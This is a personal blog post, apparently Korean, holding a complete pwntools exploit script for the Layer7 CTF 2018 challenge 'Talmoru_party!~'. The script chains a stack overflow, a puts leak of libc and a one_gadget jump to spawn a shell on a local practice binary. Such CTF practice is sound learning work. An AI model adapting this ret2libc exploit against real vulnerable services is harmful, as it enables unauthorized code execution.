Layer7 CTF 2018 Talmoru_party!~

System/Pwnable Practice 2019. 8. 2. 23:46

exploit.py

from pwn import *

p = process("./vuln")
         
e = ELF("./vuln")
l = e.libc
        
p.sendlineafter(">>","3")
             
pr = 0x0804884b
restart = 0x80486E0

payload = "A"*(0x40+4)
payload += p32(e.plt['puts'])  
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)
    
p.sendlineafter("plz!\n",payload)
p.recvuntil("Good bye~~!\n")
puts_addr = u32(p.recv(4))
libc_base = puts_addr - l.symbols['puts']
one_gadget = [0x3d0d5,0x3d0d5,0x3d0d9,0x3d0e0,0x67a7f,0x67a80,0x137e5e,0x137e5f]
one_addr = libc_base + one_gadget[0]

payload2 = "A"*(0x40+4)
payload2 += p32(one_addr)
p.sendlineafter("plz",payload2)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Layer7 CTF 2018 Life Game (0)	2019.08.05
Pico CTF 2018 echooo (0)	2019.08.04
Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01
Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Hitcon CTF 2017 start (0)	2019.07.30

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Layer7 CTF 2018 Talmoru_party!~

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바